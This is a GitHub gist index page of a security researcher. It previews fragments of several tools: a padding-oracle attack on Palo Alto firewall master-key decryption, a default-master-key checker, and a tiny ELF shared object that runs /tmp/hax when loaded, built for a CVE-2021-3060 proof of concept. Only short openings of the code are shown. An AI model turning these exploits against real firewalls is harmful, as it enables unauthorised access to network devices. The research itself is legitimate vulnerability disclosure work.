rqu1’s gists

rqu1 / 8.0 hax

Last active August 4, 2022 12:22

CVE-2019-1579 fun times

rqu1 / dst80.py

Created March 22, 2020 20:49

dst80 python implementation

	def bit(x,n): return (x>>n)&1

	def bit_slice(x,msb,lsb): return (x&((2<<msb)-1))>>lsb

	def bv2i(*args):
	o=0
	for i in args: o=(o<<1)\|i
	return o

	def fa(x): return bit(0x3a35acc5,x)

rqu1 / aes.bf

Last active October 28, 2024 13:09

AES-128 in Brainfuck

rqu1 / checkmk.py

Last active August 4, 2024 16:42

check if a PAN firewall is using the default master key when globalprotect is enabled

	from hashlib import md5, sha1
	from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
	from cryptography.hazmat.backends import default_backend
	from base64 import b64encode, b64decode
	import sys, time
	import requests

	DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

	class PanCrypt():

rqu1 / pan-oracle.py

Last active February 15, 2024 19:00

0day padding oracle in PAN master key decryption

	import paramiko
	import sys
	import requests

	pad=lambda n: '\0'(n+1)+(chr(16-n)(16-n-1))
	block_xor=lambda x,y: ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
	byte_xor=lambda x,y,z: x[:y]+chr(ord(x[y])^z)+x[y+1:]
	set_pad=lambda x,n: block_xor(pad(n), x)

	def formatData(d):

rqu1 / badlib.xx

Created September 25, 2022 06:43

.xx formatted dissection of a tiny ELF I made for cve-2021-3060

	╔═══════════════════════════════════════════════════════════════╗
	║ badlib.xx -- a tiny ELF shared object by rqu ║
	║ This will exec() /tmp/hax when dlopen()'d or loaded ║
	║ Originally released in binary form for my CVE-2021-3060 POC: ║
	║ https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756 ║
	║ build the binary with https://github.com/netspooky/xx ║
	╚═══════════════════════════════════════════════════════════════╝
	┌───────────┬───────────────────┬───────────────┬──────────────┬─────────────┐
	│ Data │ ELF header │ PHDR │ Code │ Dynamic │
	├───────────┼───────────────────┼───────────────┼──────────────┼─────────────┤

rqu rqu1